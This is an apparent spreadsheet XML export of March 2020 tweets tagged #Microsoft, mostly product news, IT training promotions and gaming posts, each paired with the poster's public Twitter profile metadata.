    <t>{'id': 93607596, 'id_str': '93607596', 'name': 'Marco Maas ðŸ±\u200dðŸ‘¤', 'screen_name': 'MoaskeFoto', 'location': 'Tilburg, Netherlands', 'description': 'Full-time geek / Photographer / Tech Support ninja @FontysOSO / #WindowsInsider / Coffee, cigarettes and wine / Cats', 'url': 'https://t.co/lXL2LAsguB', 'entities': {'url': {'urls': [{'url': 'https://t.co/lXL2LAsguB', 'expanded_url': 'http://blog.marcomaas.com', 'display_url': 'blog.marcomaas.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 423, 'friends_count': 420, 'listed_count': 56, 'created_at': 'Mon Nov 30 10:57:29 +0000 2009', 'favourites_count': 1926, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 20315, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FA6800', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme20/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme20/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1193126855785758720/86Fo-VR2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1193126855785758720/86Fo-VR2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/93607596/1580318028', 'profile_link_color': '3B94D9', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'D3D9F0', 'profile_text_color': '2B2F7D', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 13:05:18 +0000 2020</t>
  </si>
  <si>
    <t>Considerations for RRAS with #Windows 10 Always On #VPN. #Microsoft #Windows10 #Win10 #aovpn #mobility https://t.co/s5BHVskz28</t>
  </si>
  <si>
    <t>Wed Mar 04 13:03:25 +0000 2020</t>
  </si>
  <si>
    <t>Techs: Word in Sharepoint locks documents so you can't change metadata. Locked by myself. I have a temp workaround, but what's the cause of this? (started last week) #wordonline #sharepoint #office #microsoft #eviltwin</t>
  </si>
  <si>
    <t>{'id': 412956984, 'id_str': '412956984', 'name': 'Tante Reisende Tia', 'screen_name': 'TrineLil', 'location': 'RÃ¦lingen, Norge', 'description': 'Reisende, veteran, nordlending, livsnyter, tenÃ¥ringsmamma, snill men sarkastisk ðŸŒðŸŒ¿ðŸ’š', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 562, 'friends_count': 1056, 'listed_count': 13, 'created_at': 'Tue Nov 15 09:58:03 +0000 2011', 'favourites_count': 6109, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 654,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'http://pbs.twimg.com/profile_images/1212658467669975040/Y9DrDYCp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212658467669975040/Y9DrDYCp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/412956984/1367597319', 'profile_link_color': '00B884',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</si>
  <si>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Mar 04 13:03:10 +0000 2020</t>
  </si>
  <si>
    <t>The Charge Rifle Isnt That Bad!!!
#Mixer #Mixerstreamer #MixerForLife #WatchMixer #ContentCreator #Gamer #Gaming #Bronx #NYC #Xbox #XboxOne  #Microsoft #PS4 #Playstation4 #Sony #pc #apex #nzxt #pcgaming  #BPG #BloodPackGaming #Family @watchmixer @playapex @pcgaming @nzxt https://t.co/Hw0EUOk7Dz</t>
  </si>
  <si>
    <t>{'id': 3369887459, 'id_str': '3369887459', 'name': 'JuLz_BPG ðŸ”œ âœˆï¸ E3 2020', 'screen_name': 'JuLz_XxWOLFxX', 'location': 'Bronx, NY', 'description': 'Name Is Jason â€œJuLzâ€ Rosado. Lvl 33, Love To Provide For My Family. Also Living My Dream Of Playing Video Games And Streaming https://t.co/1NN8a6oGZp', 'url': 'https://t.co/iZdZPGxRlO', 'entities': {'url': {'urls': [{'url': 'https://t.co/iZdZPGxRlO', 'expanded_url': 'http://www.mixer.com/julz_BPG', 'display_url': 'mixer.com/julz_BPG', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/1NN8a6oGZp', 'expanded_url': 'https://Mixer.com/JuLz_BPG', 'display_url': 'Mixer.com/JuLz_BPG', 'indices': [126, 149]}]}}, 'protected': False, 'followers_count': 213, 'friends_count': 246, 'listed_count': 0, 'created_at': 'Fri Jul 10 22:19:22 +0000 2015', 'favourites_count': 28, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1293,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'http://pbs.twimg.com/profile_images/1220706668960452615/PrW-paDQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1220706668960452615/PrW-paDQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3369887459/1573228188',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</si>
  <si>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13:03:00 +0000 2020</t>
  </si>
  <si>
    <t>30% discount available on Arrow's Microsoft Training Schedule up to the 31st March 2020, book your training today... https://t.co/UXdZ6Id2Rp or email educationteamecs.uk@arrow.com. #ArrowEducation #Azure #Microsoft #ITtraining https://t.co/I1Xmj9ytzj</t>
  </si>
  <si>
    <t>{'id': 113897299, 'id_str': '113897299', 'name': 'Arrow ECS Education', 'screen_name': 'ArrowECS_Edu', 'location': 'Harrogate, UK', 'description': 'Arrow ECS Education - the recognized leader for specialist IT training services in Europe. Five years out through driving innovation forward.', 'url': 'http://t.co/F43QpwcNte', 'entities': {'url': {'urls': [{'url': 'http://t.co/F43QpwcNte', 'expanded_url': 'http://edu.arrowecs.eu/uk/trainings/open/trainings.html', 'display_url': 'edu.arrowecs.eu/uk/trainings/oâ€¦', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1109, 'friends_count': 1018, 'listed_count': 49, 'created_at': 'Sat Feb 13 11:38:16 +0000 2010', 'favourites_count': 54, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5468, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '424242', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/669477374141063169/FhJoAydt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/669477374141063169/FhJoAydt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/113897299/1557929374',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</si>
  <si>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13:02:59 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/4BuaGVVRKJ
4K Ultra HD enabled Video Player 2020 for Windows 10 (PC/Tablet), Android (Mobile/Tablet) and iOS (iPhone/iPad)
https://t.co/75eu9L7oFU
https://t.co/U45RO60PwQ
https://t.co/6WgJC7YAIO
#iamintel #intel #windows10 #microsoft #android #mobile #ios #iphone https://t.co/Epda8VHVp3</t>
  </si>
  <si>
    <t>Wed Mar 04 13:02:21 +0000 2020</t>
  </si>
  <si>
    <t>Who doesn't want to streamline accounting, better manage costs, and connect with customers? Excellent article on #growthhacks for small businesses. Check it out here:     #Microsoft #Technology #IT #BusinessAutomation https://t.co/XLT0yHMMc9</t>
  </si>
  <si>
    <t>Wed Mar 04 13:01:42 +0000 2020</t>
  </si>
  <si>
    <t>What makes #Microsoft a leader in the area of Sales Force Automation? See how Microsoft stacks up against competitors in this in-depth comparison by Forrester. https://t.co/pu1nEThu3s https://t.co/5qmPgkW2eV</t>
  </si>
  <si>
    <t>{'id': 247072491, 'id_str': '247072491', 'name': 'Michael Eipert', 'screen_name': 'darkhawk_1981', 'location': 'Linz, Ã–sterreich', 'description': '#IT | #Microsoft | #BusinessApplications | #MVP | #MCP | #CSP | #DevOps | #Azure | #CEO | #MisaBusinessSolutions', 'url': 'https://t.co/DhSh6Nl2if', 'entities': {'url': {'urls': [{'url': 'https://t.co/DhSh6Nl2if', 'expanded_url': 'http://www.misa.at', 'display_url': 'misa.at', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 62, 'friends_count': 379, 'listed_count': 2, 'created_at': 'Fri Feb 04 01:21:53 +0000 2011', 'favourites_count': 20, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 152,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'http://pbs.twimg.com/profile_images/1041784161160314882/J5jt_iVf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1041784161160314882/J5jt_iVf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/247072491/1537215741',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</si>
  <si>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Wed Mar 04 13:01:36 +0000 2020</t>
  </si>
  <si>
    <t>From tech adoption to tech creation: Customers across industries are using advanced cloud and AI tools to build their own digital solutions - The Official Microsoft Blog https://t.co/rqRz7vPxAX #microsoft</t>
  </si>
  <si>
    <t>{'id': 58763203, 'id_str': '58763203', 'name': 'Nishant Rana', 'screen_name': 'nishantranaCRM', 'location': 'Dubai, United Arab Emirates', 'description': 'MVP, MCC, Technology Lead - Microsoft Dynamics CE, Author #MSDyn365 #MsDynCRM', 'url': 'https://t.co/ymgSPijLV0', 'entities': {'url': {'urls': [{'url': 'https://t.co/ymgSPijLV0', 'expanded_url': 'https://nishantrana.me/', 'display_url': 'nishantrana.me', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1262, 'friends_count': 986, 'listed_count': 53, 'created_at': 'Tue Jul 21 10:41:11 +0000 2009', 'favourites_count': 4176, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7212, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '510800', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1032752479203672064/omSneSoN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1032752479203672064/omSneSoN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/58763203/1525785116', 'profile_link_color': '000000', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '2C1703', 'profile_text_color': 'A16A23', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 13:01:18 +0000 2020</t>
  </si>
  <si>
    <t>Alt+= Does Autosum: Would you like a keystroke that inserts the =SUM function. Use Alt+= and it's the same as clicking the button. #Microsoft #Office365</t>
  </si>
  <si>
    <t>Wed Mar 04 13:00:56 +0000 2020</t>
  </si>
  <si>
    <t>Do you think of Microsoft as a Cybersecurity Company? 3 Minute read on why you may want to...
https://t.co/Dmhoe4YG82
#CyberSecurity #Microsoft365 #Microsoft @MSFT365news @msPartner</t>
  </si>
  <si>
    <t>{'id': 423043570, 'id_str': '423043570', 'name': 'Dan Finn', 'screen_name': 'MSFTDan', 'location': 'Raleigh, NC', 'description': "Microsoft Gold Partner - East Coast's Fastest Growing!\n\nSending my thoughts around all things Cloud, Security and Productivity. We're in IT for the long run", 'url': 'https://t.co/e2s6ShwyRW', 'entities': {'url': {'urls': [{'url': 'https://t.co/e2s6ShwyRW', 'expanded_url': 'http://www.synergy-technical.com', 'display_url': 'synergy-technical.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 123, 'friends_count': 98, 'listed_count': 10, 'created_at': 'Mon Nov 28 00:58:19 +0000 2011', 'favourites_count': 406, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 615, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': True, 'profile_background_color': '000000', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1161642974066958336/EacZjGj1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1161642974066958336/EacZjGj1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/423043570/1565792248',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</si>
  <si>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13:00:38 +0000 2020</t>
  </si>
  <si>
    <t>Go into the tennis court again and smash your way through the championships in Smash Court Tennis 3 https://t.co/syHgO3Ai3r #microsoft #xbox360 #fun #gamer #tennis https://t.co/8E3m7nvnZ4</t>
  </si>
  <si>
    <t>Wed Mar 04 13:00:16 +0000 2020</t>
  </si>
  <si>
    <t>The market for the Internet of Things and connected devices is rapidly growing. See why Azure Sphere from Microsoft is a big deal for the IoT ecosystem https://t.co/wKHe3E2R8B
#AzureSphere #Microsoft #IoT</t>
  </si>
  <si>
    <t>{'id': 929742515347116033, 'id_str': '929742515347116033', 'name': 'XpressInsight', 'screen_name': 'XpressInsight', 'location': 'Florida, USA', 'description': 'XpressInsight is a data management services firm focusing on accelerated time to market for data warehouse projects. #informationtechnology', 'url': 'https://t.co/smKAFMDWAl', 'entities': {'url': {'urls': [{'url': 'https://t.co/smKAFMDWAl', 'expanded_url': 'http://xpress-insight.com/', 'display_url': 'xpress-insight.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 31, 'friends_count': 266, 'listed_count': 4, 'created_at': 'Sun Nov 12 16:07:44 +0000 2017', 'favourites_count': 29, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 629, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/934821180741177345/K1TqmUAh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/934821180741177345/K1TqmUAh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/929742515347116033/1511713743',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</si>
  <si>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13:00:15 +0000 2020</t>
  </si>
  <si>
    <t>The market for the Internet of Things and connected devices is rapidly growing. See why Azure Sphere from Microsoft is a big deal for the IoT ecosystem https://t.co/EHpWx5S2dR
#AzureSphere #Microsoft #IoT</t>
  </si>
  <si>
    <t>{'id': 924667418282250241, 'id_str': '924667418282250241', 'name': 'SpectrumDB', 'screen_name': 'spectrum_db', 'location': 'Tampa, FL', 'description': '24x7 #SQLserver, #Sybase, #Oracle, #MySQL, #PostgreSQL, #MongoDB and #Cassandra database support. White-label database support for #MSP.', 'url': 'https://t.co/nbb9lljVyh', 'entities': {'url': {'urls': [{'url': 'https://t.co/nbb9lljVyh', 'expanded_url': 'http://bit.ly/SpectrumDB', 'display_url': 'bit.ly/SpectrumDB', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3494, 'friends_count': 461, 'listed_count': 3, 'created_at': 'Sun Oct 29 16:01:06 +0000 2017', 'favourites_count': 36, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 686, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1190286748120686592/Mgcl6ONt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1190286748120686592/Mgcl6ONt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/924667418282250241/1572621452',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</si>
  <si>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13:00:10 +0000 2020</t>
  </si>
  <si>
    <t>The market for the Internet of Things and connected devices is rapidly growing. See why Azure Sphere from Microsoft is a big deal for the IoT ecosystem https://t.co/S2pJAzm08G
#AzureSphere #Microsoft #IoT</t>
  </si>
  <si>
    <t>{'id': 15703829, 'id_str': '15703829', 'name': 'peterdobler', 'screen_name': 'peterdobler', 'location': 'Tampa, FL', 'description': 'Data Warehouse and Database Expert specialized in SAP #Sybase (ASE, IQ, Rep), #Oracle and #SQLServer. Founder and CEO of Dobler Consulting and published author.', 'url': 'https://t.co/o06ajFmot9', 'entities': {'url': {'urls': [{'url': 'https://t.co/o06ajFmot9', 'expanded_url': 'http://www.doblerconsulting.com', 'display_url': 'doblerconsulting.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6370, 'friends_count': 5955, 'listed_count': 144, 'created_at': 'Sat Aug 02 19:09:55 +0000 2008', 'favourites_count': 50, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 18982, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0099B9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/252423193/peter_dobler-web_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/252423193/peter_dobler-web_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15703829/1501441340',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</si>
  <si>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Wed Mar 04 13:00:04 +0000 2020</t>
  </si>
  <si>
    <t>The market for the Internet of Things and connected devices is rapidly growing. See why Azure Sphere from Microsoft is a big deal for the IoT ecosystem https://t.co/6Rmap6gvjp
#AzureSphere #Microsoft #IoT</t>
  </si>
  <si>
    <t>{'id': 167567461, 'id_str': '167567461', 'name': 'Dobler Consulting', 'screen_name': 'doblerco', 'location': 'Tampa, FL', 'description': 'Dobler Consulting is an award-winning #database management &amp; support #services company in a wide range of industries. #SAP, #Microsoft and #Oracle Gold Partner.', 'url': 'https://t.co/XcBvpwtkO8', 'entities': {'url': {'urls': [{'url': 'https://t.co/XcBvpwtkO8', 'expanded_url': 'https://www.doblerconsulting.com', 'display_url': 'doblerconsulting.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 21942, 'friends_count': 4228, 'listed_count': 133, 'created_at': 'Fri Jul 16 22:51:22 +0000 2010', 'favourites_count': 162, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 12125, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '70ACF5', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/816345780495716353/RU7h_Yaz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/816345780495716353/RU7h_Yaz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/167567461/1526746468', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': '03569E', 'profile_sidebar_fill_color': 'EBEBEB', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Good story from a startup: Why were betting on the Power Platform - Data, Apss and Processes via @jukkan #Microsoft #Powerplatform https://t.co/47uRPYEtda</t>
  </si>
  <si>
    <t>Wed Mar 04 13:00:02 +0000 2020</t>
  </si>
  <si>
    <t>Attackers look around for #Microsoft #Exchange servers for #RCE vulnerability. #cybersecurity https://t.co/Yc2SDH8bnl</t>
  </si>
  <si>
    <t>{'id': 73700927, 'id_str': '73700927', 'name': 'Eduardo Almeida', 'screen_name': 'EduAlmeidaRJ', 'location': 'Miami, FL', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 183, 'friends_count': 62, 'listed_count': 1, 'created_at': 'Sat Sep 12 18:18:39 +0000 2009', 'favourites_count': 139, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3321,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'http://pbs.twimg.com/profile_images/830894716321427456/7qL-Ygap_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/830894716321427456/7qL-Ygap_normal.jpg',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</si>
  <si>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12:56:49 +0000 2020</t>
  </si>
  <si>
    <t>What are your favorite sex toys? Except hands  #El Monte   #line #microsoft https://t.co/5oEYiep8RX</t>
  </si>
  <si>
    <t>{'id': 1235003997720907776, 'id_str': '1235003997720907776', 'name': 'Stephanie Carter', 'screen_name': 'apnutfovo', 'location': 'New York, USA', 'description': 'Without his love I can do nothing, with his love, there is nothing I cannot do.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 24, 'listed_count': 0, 'created_at': 'Wed Mar 04 00:49:05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'http://pbs.twimg.com/profile_images/1235007203746230272/iq7i2Zjy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235007203746230272/iq7i2Zjy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235003997720907776/1583283662',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</si>
  <si>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12:55:02 +0000 2020</t>
  </si>
  <si>
    <t>Forms Activity Reports in the #Microsoft Admin Center https://t.co/E519fkgweg https://t.co/w1ZVyO9vFj</t>
  </si>
  <si>
    <t>Wed Mar 04 12:54:59 +0000 2020</t>
  </si>
  <si>
    <t>Kicking off the second #session with a status update of Modern #Workplace initiative!
#MITA #Microsoft #Teams #Office365 https://t.co/QRoec76CSP</t>
  </si>
  <si>
    <t>Wed Mar 04 12:54:01 +0000 2020</t>
  </si>
  <si>
    <t>Day 58/366. 2002/6/30.
#VideoGameCollection #Games #Gaming #Microsoft #Xbox #PrisonerOfWar #Codemasters @ Greensboro, North Carolina https://t.co/rCrBIUmIN7</t>
  </si>
  <si>
    <t>Wed Mar 04 12:47:46 +0000 2020</t>
  </si>
  <si>
    <t>#COVID19: Vice-President #VeraJourova discusses the issue of #disinformation with online platforms. She met 
met representatives of #Google #Facebook #Twitter #Microsoft to discuss the spread of disinformation around the #coronavirus
https://t.co/EFpCSTblAP #CoronaVirusUpdate</t>
  </si>
  <si>
    <t>{'id': 253615321, 'id_str': '253615321', 'name': 'Alex von Witzleben', 'screen_name': 'AlexWitzleben', 'location': 'Brussels', 'description': 'Economic historian - follow EU competitiveness, getting out of economic crisis, promote Europe, start-ups, smart and innovative green policies', 'url': 'https://t.co/57iwMbtcZ0', 'entities': {'url': {'urls': [{'url': 'https://t.co/57iwMbtcZ0', 'expanded_url': 'https://www.facebook.com/profile.php?id=100017487731251', 'display_url': 'facebook.com/profile.php?idâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 9793, 'friends_count': 8797, 'listed_count': 1029, 'created_at': 'Thu Feb 17 16:21:04 +0000 2011', 'favourites_count': 13577, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 77730,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'http://pbs.twimg.com/profile_images/925795001996595203/o33gdmaY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/925795001996595203/o33gdmaY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/253615321/1515010739', 'profile_link_color': '0084B4',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</si>
  <si>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12:47:36 +0000 2020</t>
  </si>
  <si>
    <t>Benefits of Microsoft Dynamics 365 
1. Understand your customers in a completely new way 
2. Flexibility
3. Simplicity
4. Scalability
5. Productive 
To know more: https://t.co/H9qRN7wMCc
#microsoftdynamics365 #dynamics365 #business #microsoft #technology https://t.co/X3a6SKhAsE</t>
  </si>
  <si>
    <t>{'id': 1087295171866382336, 'id_str': '1087295171866382336', 'name': 'Ingenious_Results', 'screen_name': 'ingeniousresult', 'location': 'Prosper, TX', 'description': 'Ingenious Results is a software, web, mobile, and cloud engineering and development company that provides the highest quality services across North America', 'url': 'https://t.co/zaTrpw7aTL', 'entities': {'url': {'urls': [{'url': 'https://t.co/zaTrpw7aTL', 'expanded_url': 'http://ingeniousresults.com/', 'display_url': 'ingeniousresults.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 192, 'friends_count': 670, 'listed_count': 0, 'created_at': 'Mon Jan 21 10:25:44 +0000 2019', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 38, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1087680495314456577/10uQQuHX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1087680495314456577/10uQQuHX_normal.jpg',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</si>
  <si>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12:47:24 +0000 2020</t>
  </si>
  <si>
    <t>@TrianoPeter $NVDA is favorite considering the overall gaming environment and #Sony #Microsoft moving to game streaming.</t>
  </si>
  <si>
    <t>{'id': 1176597420819570694, 'id_str': '1176597420819570694', 'name': "Proposition Po'boy", 'screen_name': 'ArgsDef', 'location': 'United States', 'description': 'Common problems are solved by data and research, everything else requires music. Recovering equity researcher. Be careful, I offend the sensitive.', 'url': 'https://t.co/7E3RpU4E0K', 'entities': {'url': {'urls': [{'url': 'https://t.co/7E3RpU4E0K', 'expanded_url': 'https://m.youtube.com/watch?v=GFDrL49uLRU', 'display_url': 'm.youtube.com/watch?v=GFDrL4â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 73, 'friends_count': 403, 'listed_count': 0, 'created_at': 'Tue Sep 24 20:41:11 +0000 2019', 'favourites_count': 1564, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2284, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1176598473224929281/_1OLEFB9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1176598473224929281/_1OLEFB9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1176597420819570694/1569359513',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</si>
  <si>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12:46:34 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft uses its expertise in malware to help with fileless attack detection on #Linux - The Register https://t.co/vwynB0zCvA</t>
  </si>
  <si>
    <t>{'id': 487341194, 'id_str': '487341194', 'name': 'Oznet Support', 'screen_name': 'OznetSupport', 'location': 'Sydney Australia', 'description': 'Oznet Support - 24/7 support provided, tweet your query or visit http://t.co/7xELA8mnFA', 'url': 'http://t.co/7xELA8mnFA', 'entities': {'url': {'urls': [{'url': 'http://t.co/7xELA8mnFA', 'expanded_url': 'http://support.oznet.com.au', 'display_url': 'support.oznet.com.au', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'http://t.co/7xELA8mnFA', 'expanded_url': 'http://support.oznet.com.au', 'display_url': 'support.oznet.com.au', 'indices': [65, 87]}]}}, 'protected': False, 'followers_count': 336, 'friends_count': 180, 'listed_count': 80, 'created_at': 'Thu Feb 09 08:09:23 +0000 2012', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 66297, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FCFDFC', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1816392315/oznet_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1816392315/oznet_normal.jpg',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</si>
  <si>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12:42:12 +0000 2020</t>
  </si>
  <si>
    <t>A 3-day course to get the #skills and #knowledge to develop, train and deploy #machinelearning solutions with #MicrosoftAzure services #cloud #Microsoft https://t.co/b9HBALNxzD https://t.co/8Buca34MKd</t>
  </si>
  <si>
    <t>{'id': 92847125, 'id_str': '92847125', 'name': 'Global Knowledge IE', 'screen_name': 'GKIreland', 'location': 'Dublin, Ireland', 'description': 'Worldwide leader in #ITtraining &amp; #BusinessSkills training, featuring #Cisco, #Microsoft, #Citrix, #VMware, #IBM and Best Practice including #ITIL &amp; #PRINCE2', 'url': 'http://t.co/xg9ulnj4iE', 'entities': {'url': {'urls': [{'url': 'http://t.co/xg9ulnj4iE', 'expanded_url': 'http://www.globalknowledge.ie', 'display_url': 'globalknowledge.ie', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1021, 'friends_count': 1218, 'listed_count': 106, 'created_at': 'Thu Nov 26 22:18:10 +0000 2009', 'favourites_count': 105, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4057, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0FFFFF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/551289942/GKLogoRGB1440x1080_normal.jpg', 'profile_image_url_https': 